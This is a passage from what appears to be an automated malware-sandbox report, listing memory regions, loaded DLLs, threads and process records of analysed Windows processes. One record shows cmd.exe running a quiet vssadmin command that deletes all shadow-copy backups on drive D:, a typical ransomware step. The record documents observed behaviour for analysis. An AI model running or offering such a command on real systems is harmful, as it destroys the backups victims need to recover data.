	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5594
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5595
	        start_va = 0x4880000
	          end_va = 0x4a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 5602
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5603
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5605
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5606
	        start_va = 0x7ea90000
	          end_va = 0x7eb8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ea90000"
	        filename = ""

Region:
	              id = 5615
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5616
	        start_va = 0x830000
	          end_va = 0x833fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000830000"
	        filename = ""

Region:
	              id = 5617
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 5618
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5619
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 5620
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 5621
	        start_va = 0x5d0000
	          end_va = 0x5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005d0000"
	        filename = ""

Region:
	              id = 5622
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 5623
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 5624
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 5625
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 5626
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 5627
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 5628
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 5629
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 5632
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 5633
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 5634
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 5635
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 5636
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 5637
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 5642
	        start_va = 0x4a60000
	          end_va = 0x4b6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a60000"
	        filename = ""

Region:
	              id = 5643
	        start_va = 0x440000
	          end_va = 0x5c7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000440000"
	        filename = ""

Region:
	              id = 5644
	        start_va = 0x4880000
	          end_va = 0x48a9fff
	       monitored = 0
	     entry_point = 0x4885680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5645
	        start_va = 0x4960000
	          end_va = 0x4a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004960000"
	        filename = ""

Region:
	              id = 5646
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5647
	        start_va = 0x5e0000
	          end_va = 0x760fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000005e0000"
	        filename = ""

Region:
	              id = 5648
	        start_va = 0x840000
	          end_va = 0x84cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 5649
	        start_va = 0x4b70000
	          end_va = 0x5f6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b70000"
	        filename = ""

Region:
	              id = 5650
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 5651
	        start_va = 0x770000
	          end_va = 0x770fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000770000"
	        filename = ""

Region:
	              id = 5653
	        start_va = 0x850000
	          end_va = 0x853fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000850000"
	        filename = ""

Region:
	              id = 5654
	        start_va = 0x4a60000
	          end_va = 0x4b49fff
	       monitored = 0
	     entry_point = 0x4a9d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 5655
	        start_va = 0x4b60000
	          end_va = 0x4b6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004b60000"
	        filename = ""

Region:
	              id = 5658
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 5916
	        start_va = 0x4880000
	          end_va = 0x4880fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004880000"
	        filename = ""

Region:
	              id = 5917
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 5918
	        start_va = 0x4890000
	          end_va = 0x4890fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004890000"
	        filename = ""

Region:
	              id = 5963
	        start_va = 0x780000
	          end_va = 0x7bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000780000"
	        filename = ""

Region:
	              id = 5964
	        start_va = 0x7c0000
	          end_va = 0x7fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007c0000"
	        filename = ""

Region:
	              id = 5970
	        start_va = 0x48a0000
	          end_va = 0x48dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 5971
	        start_va = 0x48e0000
	          end_va = 0x491ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048e0000"
	        filename = ""

Region:
	              id = 5972
	        start_va = 0x4920000
	          end_va = 0x495ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004920000"
	        filename = ""

Region:
	              id = 5973
	        start_va = 0x4a60000
	          end_va = 0x4a9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a60000"
	        filename = ""


Thread:
	id = 408
	os_tid = 0xdf0


Thread:
	id = 410
	os_tid = 0x1314


Thread:
	id = 429
	os_tid = 0x640


Thread:
	id = 431
	os_tid = 0x11e4


Thread:
	id = 432
	os_tid = 0x10b0


Process:
	id = "77"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x29f6f000"
	os_pid = "0xe08"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=D: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5678
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5679
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5680
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5681
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5682
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 5683
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 5684
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 5685
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 5686
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 5687
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 5688
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 5689
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5690
	        start_va = 0x7eed0000
	          end_va = 0x7eef2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eed0000"
	        filename = ""

Region:
	              id = 5691
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5692
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5693
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5694
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5695
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5702
	        start_va = 0x4600000
	          end_va = 0x473ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 5705
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5706
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5707
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5708
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5709
	        start_va = 0x4740000
	          end_va = 0x49cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004740000"
	        filename = ""

Region:
	              id = 5710
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5711
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5712
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5713
	        start_va = 0x7edd0000
	          end_va = 0x7eecffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007edd0000"
	        filename = ""

Region:
	              id = 5865
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5866
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5869
	        start_va = 0x280000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000280000"
	        filename = ""

Region:
	              id = 5870
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 5871
	        start_va = 0x4730000
	          end_va = 0x473ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004730000"
	        filename = ""

Region:
	              id = 5872
	        start_va = 0x4740000
	          end_va = 0x489ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004740000"
	        filename = ""

Region:
	              id = 5873
	        start_va = 0x48d0000
	          end_va = 0x49cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048d0000"
	        filename = ""

Region:
	              id = 5982
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""


Thread:
	id = 412
	os_tid = 0x1224


Thread:
	id = 425
	os_tid = 0x12bc


Process:
	id = "78"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2bf2a000"
	os_pid = "0x1210"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "77"
	os_parent_pid = "0xe08"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5714
	        start_va = 0xd400000
	          end_va = 0xd5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000d400000"
	        filename = ""

Region:
	              id = 5715
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5716
	        start_va = 0x330d3c0000
	          end_va = 0x330d3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000330d3c0000"
	        filename = ""

Region:
	              id = 5717
	        start_va = 0x330d400000
	          end_va = 0x330d5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000330d400000"
	        filename = ""

Region:
	              id = 5718
	        start_va = 0x18391c40000
	          end_va = 0x18391c5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391c40000"
	        filename = ""

Region:
	              id = 5719
	        start_va = 0x18391c60000
	          end_va = 0x18391c74fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018391c60000"
	        filename = ""

Region:
	              id = 5720
	        start_va = 0x7df5ff610000
	          end_va = 0x7ff5ff60ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff610000"
	        filename = ""

Region:
	              id = 5721
	        start_va = 0x7ff7ff220000
	          end_va = 0x7ff7ff242fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff220000"
	        filename = ""

Region:
	              id = 5722
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 5723
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5724
	        start_va = 0x18391c80000
	          end_va = 0x18391d9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391c80000"
	        filename = ""

Region:
	              id = 5728
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 5729
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 5730
	        start_va = 0x18391c40000
	          end_va = 0x18391c4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018391c40000"
	        filename = ""

Region:
	              id = 5731
	        start_va = 0x7ff7ff120000
	          end_va = 0x7ff7ff21ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff120000"
	        filename = ""

Region:
	              id = 5732
	        start_va = 0x18391da0000
	          end_va = 0x18391e5dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5733
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 5734
	        start_va = 0x330d600000
	          end_va = 0x330d63ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000330d600000"
	        filename = ""

Region:
	              id = 5735
	        start_va = 0x18391e60000
	          end_va = 0x18391ebffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391e60000"
	        filename = ""

Region:
	              id = 5736
	        start_va = 0x18391c50000
	          end_va = 0x18391c56fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391c50000"
	        filename = ""

Region:
	              id = 5737
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 5738
	        start_va = 0x18391c80000
	          end_va = 0x18391c80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018391c80000"
	        filename = ""

Region:
	              id = 5739
	        start_va = 0x18391ca0000
	          end_va = 0x18391d9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391ca0000"
	        filename = ""

Region:
	              id = 5740
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 5741
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 5742
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 5743
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
